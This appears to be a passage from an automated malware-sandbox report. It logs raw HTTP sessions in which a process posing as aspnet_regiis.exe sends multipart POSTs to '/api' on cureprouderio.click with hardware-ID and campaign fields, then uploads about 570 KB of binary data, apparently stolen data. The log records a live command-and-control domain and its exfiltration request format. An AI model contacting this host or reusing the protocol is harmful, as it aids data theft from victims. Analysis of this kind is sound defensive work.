                                                                                            CF-RAY: 8fd5f2de9df24326-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1724&rtt_var=650&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2849&recv_bytes=19065&delivery_rate=1677197&cwnd=178&unsent_bytes=0&cid=7067a8e5c6b5c206&ts=987&x=0"
                                                                                            2025-01-05 19:41:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2025-01-05 19:41:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.449733172.67.132.74437332C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-05 19:41:58 UTC284OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=EPPY8583NRMLK1Y9P1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8791
                                                                                            Host: cureprouderio.click
                                                                                            2025-01-05 19:41:58 UTC8791OUTData Raw: 2d 2d 45 50 50 59 38 35 38 33 4e 52 4d 4c 4b 31 59 39 50 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 36 39 44 36 39 33 39 42 45 43 33 37 31 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 45 50 50 59 38 35 38 33 4e 52 4d 4c 4b 31 59 39 50 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 50 50 59 38 35 38 33 4e 52 4d 4c 4b 31 59 39 50 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 67 79 66 73 73
                                                                                            Data Ascii: --EPPY8583NRMLK1Y9P1Content-Disposition: form-data; name="hwid"6569D6939BEC37108EEA336AD54C4C07--EPPY8583NRMLK1Y9P1Content-Disposition: form-data; name="pid"2--EPPY8583NRMLK1Y9P1Content-Disposition: form-data; name="lid"LPnhqo--gyfss
                                                                                            2025-01-05 19:41:58 UTC1129INHTTP/1.1 200 OK
                                                                                            Date: Sun, 05 Jan 2025 19:41:58 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=grui2ti7hvmq7ts7map79s060e; expires=Thu, 01 May 2025 13:28:37 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBCZEfQmpwR1sGLaTcmgtheYn56pfWCl56PvZijSkLaZkX6APF%2Be3fcxONBuNvLcsnwFl9iL5MmPeZpJzjruotXpO9aci%2FVu41AKrHz%2BfjATcUwzIz7wSi%2B1RUwQ0s9J2U7fecwH"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fd5f2e848650f80-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1622&rtt_var=622&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2849&recv_bytes=9733&delivery_rate=1741204&cwnd=207&unsent_bytes=0&cid=82634ab13e65e4a4&ts=498&x=0"
                                                                                            2025-01-05 19:41:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2025-01-05 19:41:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.449734172.67.132.74437332C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-05 19:41:59 UTC282OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=JFRI0XTWAP9VNET
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 20426
                                                                                            Host: cureprouderio.click
                                                                                            2025-01-05 19:41:59 UTC15331OUTData Raw: 2d 2d 4a 46 52 49 30 58 54 57 41 50 39 56 4e 45 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 36 39 44 36 39 33 39 42 45 43 33 37 31 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 4a 46 52 49 30 58 54 57 41 50 39 56 4e 45 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4a 46 52 49 30 58 54 57 41 50 39 56 4e 45 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 67 79 66 73 73 68 62 79 6f 74 73 6a 0d 0a
                                                                                            Data Ascii: --JFRI0XTWAP9VNETContent-Disposition: form-data; name="hwid"6569D6939BEC37108EEA336AD54C4C07--JFRI0XTWAP9VNETContent-Disposition: form-data; name="pid"3--JFRI0XTWAP9VNETContent-Disposition: form-data; name="lid"LPnhqo--gyfsshbyotsj
                                                                                            2025-01-05 19:41:59 UTC5095OUTData Raw: 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                            2025-01-05 19:42:00 UTC1133INHTTP/1.1 200 OK
                                                                                            Date: Sun, 05 Jan 2025 19:42:00 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=floja3u4ns9e6ht9jpb0mbriek; expires=Thu, 01 May 2025 13:28:39 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTK%2B1G%2Bglo06pBprz828aLNY3ThK2CFwAAcVZfS%2Fa2nGwLSgs4JaLT%2FVpuAXWdJDv3jrDygWoXke0aI1PXRBm1T8LXdtNJEp3p0vZu5%2B3L7ut7Vh4YCpTaO8ipW0KYGY7kdtMxrw"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fd5f2efe8b70ca0-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1667&rtt_var=648&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2850&recv_bytes=21388&delivery_rate=1660034&cwnd=239&unsent_bytes=0&cid=27685dc60379d5ae&ts=639&x=0"
                                                                                            2025-01-05 19:42:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2025-01-05 19:42:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449735172.67.132.74437332C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-05 19:42:00 UTC279OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=7KD821I4EZLFX
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 1244
                                                                                            Host: cureprouderio.click
                                                                                            2025-01-05 19:42:00 UTC1244OUTData Raw: 2d 2d 37 4b 44 38 32 31 49 34 45 5a 4c 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 36 39 44 36 39 33 39 42 45 43 33 37 31 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 37 4b 44 38 32 31 49 34 45 5a 4c 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 4b 44 38 32 31 49 34 45 5a 4c 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 67 79 66 73 73 68 62 79 6f 74 73 6a 0d 0a 2d 2d 37 4b 44 38
                                                                                            Data Ascii: --7KD821I4EZLFXContent-Disposition: form-data; name="hwid"6569D6939BEC37108EEA336AD54C4C07--7KD821I4EZLFXContent-Disposition: form-data; name="pid"1--7KD821I4EZLFXContent-Disposition: form-data; name="lid"LPnhqo--gyfsshbyotsj--7KD8
                                                                                            2025-01-05 19:42:01 UTC1132INHTTP/1.1 200 OK
                                                                                            Date: Sun, 05 Jan 2025 19:42:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=eg4df1nih40iur87a509ekopjk; expires=Thu, 01 May 2025 13:28:40 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V4yUJRw%2FaxQP%2BWRe1x%2BaFm4GpaqfVqJPvLM6TZWMivqiX6s7Q%2Fbu6qx3ep%2FmAmXSuBYcbGg8SsiDnpb79GpoT8qe2CO5v%2BszeceFoGJVeguTf8m6FPDCjH9lcJ3I97Ep8wcuelGC"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fd5f2f85a63c332-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1624&rtt_var=624&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=2159&delivery_rate=1732937&cwnd=180&unsent_bytes=0&cid=2ab37a75a725579a&ts=474&x=0"
                                                                                            2025-01-05 19:42:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2025-01-05 19:42:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.449736172.67.132.74437332C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-05 19:42:02 UTC276OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=CHY259J8
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 569954
                                                                                            Host: cureprouderio.click
                                                                                            2025-01-05 19:42:02 UTC15331OUTData Raw: 2d 2d 43 48 59 32 35 39 4a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 36 39 44 36 39 33 39 42 45 43 33 37 31 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 43 48 59 32 35 39 4a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 48 59 32 35 39 4a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 67 79 66 73 73 68 62 79 6f 74 73 6a 0d 0a 2d 2d 43 48 59 32 35 39 4a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                            Data Ascii: --CHY259J8Content-Disposition: form-data; name="hwid"6569D6939BEC37108EEA336AD54C4C07--CHY259J8Content-Disposition: form-data; name="pid"1--CHY259J8Content-Disposition: form-data; name="lid"LPnhqo--gyfsshbyotsj--CHY259J8Content-D
                                                                                            2025-01-05 19:42:02 UTC15331OUTData Raw: 30 95 58 29 cd 58 02 48 7a 12 16 4c 79 1c f6 0a b0 cd 14 c0 ef c2 6b 7d 87 71 48 46 6f 2b bc c6 18 3a 2f 49 c3 ef 26 bb 88 80 33 ea 58 18 c7 c5 ae 59 a3 43 15 b7 af ee e7 ba 6d 07 a9 41 8e ff 6f 95 92 e6 03 74 fb 5d c1 1d 34 a8 27 93 7b 82 80 d7 16 0e 16 a0 29 38 a7 85 85 97 98 b1 7b d2 4a 05 20 de 9f 0b 46 a9 c7 18 bc 05 43 db 36 4b 88 71 48 aa 57 18 5c 4a 4c 73 70 c3 81 06 79 5e 80 31 3a 66 7b 86 43 09 24 a7 02 53 b7 f3 8b 34 69 7e 9b 9f 93 c3 1e 7e 31 62 8a 76 4a 79 39 72 a1 e8 11 e3 f8 57 8b 53 2a bc 69 ad 38 6a 85 a9 ac c6 10 2c d3 53 84 d8 00 de 8f a2 62 4c c1 05 0c 8b 92 b2 d5 e0 ef 22 cf a9 75 24 72 49 2b f2 55 fc 63 c6 e3 ab 76 12 54 32 23 1d 0b 4b 2c 6b ce bc 5b 02 7e 7b 68 da e8 40 41 f0 a3 1f cd de 3c 32 12 a8 12 bf 76 f3 68 1e 8a 5a 1f 1d f1
                                                                                            Data Ascii: 0X)XHzLyk}qHFo+:/I&3XYCmAot]4'{)8{J FC6KqHW\JLspy^1:f{C$S4i~~1bvJy9rWS*i8j,SbL"u$rI+UcvT2#K,k[~{h@A<2vhZ
                                                                                            2025-01-05 19:42:02 UTC15331OUTData Raw: 65 24 8d 7d 1c 69 63 e6 f4 6a 3a a3 fd d7 1a 34 87 b0 bc 51 50 0a fb a2 de 2a b7 49 c0 91 9b 0a 63 f9 13 11 2d 14 89 60 2f 09 da a9 07 b8 8e 17 08 2a 52 66 18 ec 95 8a 2c 31 5d cb 7c 34 6c 2a 46 ab 8c 4f 3f ab 5c 97 0c 11 20 ee e9 7e 97 df 44 37 99 82 85 62 b4 54 1f e2 e5 0a 5f 68 cc 7e 28 14 19 db 3d 69 08 7c 90 e8 37 75 4a 11 88 09 2a b9 a6 14 a3 83 ee 19 0c 17 9a fd 62 34 3d d8 b1 4e 2f b1 d8 df 79 9e 29 89 0e 17 e4 ed ab a7 ff a5 ea fa 3d 8e c2 30 28 e3 cc cd 19 f9 ad be 39 66 c9 19 90 46 f8 9d af c8 cd 75 33 88 70 ad 1d a1 5a df 1f 20 ef e9 ba 1e 41 b9 72 86 eb f2 06 0f 8d be 9a 9f fa 2e 76 b9 f2 af a0 9f 2d 1a 9b f1 de 2e 90 8f 26 9c 79 82 8c b9 83 b9 fb 60 f1 52 4c 56 9e da 9d 78 36 a9 f5 20 f9 02 a3 61 e1 04 bb 51 37 4f 22 8c 99 5a 53 f6 a1 34 14
                                                                                            Data Ascii: e$}icj:4QP*Ic-`/*Rf,1]|4l*FO?\ ~D7bT_h~(=i|7uJ*b4=N/y)=0(9fFu3pZ Ar.v-.&y`RLVx6 aQ7O"ZS4
                                                                                            2025-01-05 19:42:02 UTC15331OUTData Raw: bb 77 80 ea 0b 5d 4e bf b7 0c 29 fa ea b7 27 25 b6 4b 5f ed a9 17 97 9e 5d 0d 03 b6 31 a8 39 b6 59 6b 5e 09 c0 50 7f df fd 78 e4 15 d3 a5 2f 38 03 75 a0 65 be 79 df a3 75 c2 d5 70 a5 d4 14 6f eb 60 94 ff ee da d4 5f 04 dd 14 41 f1 17 b1 03 be e0 8c cd 7f 45 93 a3 d7 3b ea 8c 72 96 26 9a ad b6 97 8a 3e 3a f1 92 a3 e5 77 97 d4 7c e2 9a ed 9c 0f bf 5e 78 ef bf 97 21 3b 2c 78 87 e2 f6 01 dd 8b fc fc 90 23 fd 80 f0 5f 2d 25 75 73 93 73 91 ea 1a ba 64 f7 f1 46 6f d4 92 c8 4d b4 c7 3d d7 24 a1 a4 06 3d 41 33 17 30 d6 a6 c6 54 ea f6 16 04 d7 96 60 e7 51 ea e6 71 19 3a 61 70 cb ef ce c9 cf dd 38 66 4f fb d1 92 b4 85 47 94 bd dd ed 1f e7 52 2b 7f 70 0c e2 2c 28 b2 57 9b ef f2 14 2f 9e a3 f9 95 b5 f6 93 3f ed 9e e1 e9 b7 fc a9 7a d0 ed d5 07 5b 35 8a 45 69 f3 58 b1
                                                                                            Data Ascii: w]N)'%K_]19Yk^Px/8ueyupo`_AE;r&>:w|^x!;,x#_-%ussdFoM=$=A30T`Qq:ap8fOGR+p,(W/?z[5EiX
                                                                                            2025-01-05 19:42:02 UTC15331OUTData Raw: e2 e0 e6 41 1d e1 2e 5f ad d3 1c 1f 29 a3 f1 36 07 af 72 72 ce 82 d7 d0 c8 0b d5 a5 da e4 aa b2 24 74 ec 01 d5 11 0b 8e 4d f0 7e 67 17 79 b1 dd 3b 7b 5a 99 6e 0f b9 cd 9a 95 79 4f fe 1e 2b c9 80 57 05 6e 56 67 b8 e6 42 bc 65 44 2f c2 60 8e 0b fe 30 63 70 73 2f 42 08 18 4d e4 42 75 44 a0 f7 fa 0c 1f 71 70 5c cd 66 07 f2 3c 94 de 10 f5 bf 32 69 8b 0c 0a b8 ed 35 e9 54 74 1f 09 3e dc cb 6c e2 01 43 14 c7 51 6b 55 17 8c f0 ce bb f7 9f 0e bf d7 36 f5 d7 92 74 b8 7f 44 d2 e6 9e ca 7b 65 73 52 ba 1f fa ef 03 5a d3 c2 c9 84 15 88 e1 9f 48 e5 fb ff bf 92 1b 92 a0 74 8c 07 ce 03 8b 7f 06 2e c9 2c be 11 62 54 95 53 52 5a 90 c5 f0 e7 c5 92 47 45 3c 1c 84 f3 54 fb 27 ce 8e 70 c2 77 89 b2 ac 04 41 c4 9f ed e9 40 45 fb 19 92 58 6b 90 1a b8 15 a5 4d 3d f4 71 df 43 d6 83
                                                                                            Data Ascii: A._)6rr$tM~gy;{ZnyO+WnVgBeD/`0cps/BMBuDqp\f<2i5Tt>lCQkU6tD{esRZHt.,bTSRZGE<T'pwA@EXkM=qC
                                                                                            2025-01-05 19:42:02 UTC15331OUTData Raw: 4a 93 1b df cb 89 b3 9d 93 4b 6b 43 36 6e 15 f3 eb cc 22 e4 9c ea 24 84 9b ca 91 15 16 8d 9f 97 6b b0 d5 f2 85 2e f6 84 02 b9 67 51 85 a4 46 03 03 5f 81 1f 07 5b 02 a9 ea ca ad de da b5 09 50 bc f7 b6 cf b3 34 2d 64 60 c1 f6 ab 1d b5 22 d6 32 8c 00 c4 ae 5a 67 94 72 b8 3e c7 b6 8b 63 4a bf 10 06 04 dd 18 bb c7 d7 73 ff c8 dd ad 49 a7 7a c5 ee 22 67 8f b6 64 a1 12 95 68 43 31 fb f1 be cb 1f 8d 6c be e9 7b 16 08 1a 6a 34 85 6d f1 85 9d 6e e3 2b ce 37 9c 75 8c ed ad d8 7e f0 23 c8 f0 87 d0 39 67 d9 5f 75 89 cf a0 df 25 d8 dc ca 44 0c 01 3c 18 2a a0 b7 b6 0d ca db 72 7f b8 42 c2 d9 88 de 41 dc fa 2d 7a c1 51 9d c3 5b fa b8 43 1c 7f d4 c4 d6 51 7a 91 99 01 c9 b0 4a 92 11 bd 4f 4d 7d 56 4f 1e 13 02 fb fc a8 0e e9 9f 62 9e 07 f9 57 31 72 84 98 e3 f7 79 c0 c2 4e
                                                                                            Data Ascii: JKkC6n"$k.gQF_[P4-d`"2Zgr>cJsIz"gdhC1l{j4mn+7u~#9g_u%D<*rBA-zQ[CQzJOM}VObW1ryN
                                                                                            2025-01-05 19:42:02 UTC15331OUTData Raw: 96 b7 59 d6 2e 64 7a fd 67 39 45 4e 94 bc ab eb 39 ab e4 ff 6b ab f8 89 93 45 c0 d7 3b 87 f3 e2 aa 3c de ec 6b 0b 8c d3 ed fb 86 c4 bb 73 df aa b2 86 25 9a 60 17 4e 95 20 23 05 41 1e 3a b0 ba 34 23 29 8d 13 84 dc 40 9d db 4c 41 ea 6e 36 6c a2 dc e1 56 d5 43 d1 1f 17 01 61 d5 3b 08 dc c2 c9 cc 66 4e 70 a0 4a fe b7 65 af 6c 7c f4 92 01 d7 ee 2c 0f c9 7a 99 fa d7 bf 3e 7e 84 fc b1 33 3e 1b 48 10 ef bd 81 5b c4 21 cb 6f 39 a6 b9 cf 95 c4 57 e3 15 ad 68 49 8c f5 9f 99 f8 c8 27 9b a1 29 88 e4 db 2c cc e6 b8 2d 69 28 a1 40 1b 09 37 1f b0 22 4d d0 59 b9 b3 5a fa 6d 3e 9a f5 33 4a f4 26 1a e0 36 57 7f a6 b1 7c 86 10 f4 6b a3 4b 8f 73 ee 05 32 d9 01 ce d5 3f ae 45 39 f4 82 c5 1a 21 70 75 63 b4 e4 63 8d f4 68 a5 52 df 66 25 4c 7d 0c 40 74 29 fd 1d 07 f0 28 fb 28 9d
                                                                                            Data Ascii: Y.dzg9EN9kE;<ks%`N #A:4#)@LAn6lVCa;fNpJel|,z>~3>H[!o9WhI'),-i(@7"MYZm>3J&6W|kKs2?E9!pucchRf%L}@t)((
                                                                                            2025-01-05 19:42:02 UTC15331OUTData Raw: d4 9f 44 42 88 1c 62 de 89 7a 20 60 0e 5e 37 9c bf 16 0a 13 9e 87 e8 f3 27 2e 0e 55 38 8c e6 a5 13 44 34 19 0a e9 8a af c9 09 9e a6 b0 69 3d 5c 26 d5 45 e5 be 9b b6 b9 18 86 81 09 64 67 be 5f ed ff 6d 4f 6b d1 cb fc 91 b0 09 78 0e cc 3d 47 c1 b2 f3 67 c6 5f 60 61 3e 1c ef a2 34 b6 73 7c 62 ce 95 6d 3f 10 69 40 d4 46 99 89 f5 15 dd b0 af 75 51 4a 9f 1b 4f 31 bb a0 78 49 29 c3 60 4e bd cd 35 d6 be 86 28 1f aa 77 49 30 9e cc 0f 78 05 d6 63 ab 8e ba d6 77 9a 35 8d ef 0f 71 94 0a 40 62 56 f9 8a 7a e9 0f 3c fd 49 d8 eb fb 16 bd a1 64 64 77 6a 5c 4b 0d ef 89 68 a0 d9 7c 1a fc 56 be aa 5f e2 c9 79 51 f6 e0 f8 b0 44 bf d3 a6 f3 bf 88 27 94 c2 fd 53 f5 57 05 48 81 1e 31 8c 61 a3 fc 9e 92 80 6b 5e 4b 9b 5f 12 f1 a4 5a 53 b9 f4 9f d7 69 67 f5 86 9a 69 73 88 a5 02 98
                                                                                            Data Ascii: DBbz `^7'.U8D4i=\&Edg_mOkx=Gg_`a>4s|bm?i@FuQJO1xI)`N5(wI0xcw5q@bVz<Iddwj\Kh|V_yQD'SWH1ak^K_ZSigis
                                                                                            2025-01-05 19:42:02 UTC15331OUTData Raw: e8 83 99 08 2d 09 62 e6 cb 82 aa cb fb 01 fc 2f 2f 88 36 98 74 af cc 59 7b 99 d8 42 d6 c6 72 1d 50 df 35 79 04 b6 9b 39 cc 48 81 ab bb 4d e5 21 52 3c 1c 84 2c 13 ce b0 74 1f 4d 86 5f 93 79 31 76 41 12 4b 9c e2 eb f8 95 e0 b7 20 dc 4a 40 44 ba f9 79 cc 3f 50 e1 ce ed a9 50 ef 74 e8 58 82 2c b3 71 9d 26 82 df 25 0b bf 03 28 b7 a1 a4 d8 ad 83 cf 43 88 f8 1b 8c 8b c9 b6 b3 dd 45 c3 7a 6c 19 61 21 37 ee c1 6b a3 05 c2 51 2a 9d 80 3b 31 17 7e 94 00 6b 19 fe 9a 63 72 5e e9 b4 35 44 4b 88 0a 41 ca 1b 81 3a 54 61 82 08 9d b0 ef 52 fd 03 88 1f e2 e3 17 94 f8 56 73 e0 51 ac fc d3 4f e0 40 ef d7 a6 7c 94 59 43 b0 04 e7 0d 48 7f 12 ac 8a a0 05 bb c6 34 be 78 32 a8 ee 90 df 1e c0 37 9b 94 47 e6 e7 9b dd a2 47 85 09 0a 33 b5 97 85 f9 be 55 7f 96 67 68 f3 d3 a9 6c 97 2a
                                                                                            Data Ascii: -b//6tY{BrP5y9HM!R<,tM_y1vAK J@Dy?PPtX,q&%(CEzla!7kQ*;1~kcr^5DKA:TaRVsQO@|YCH4x27GG3Ughl*
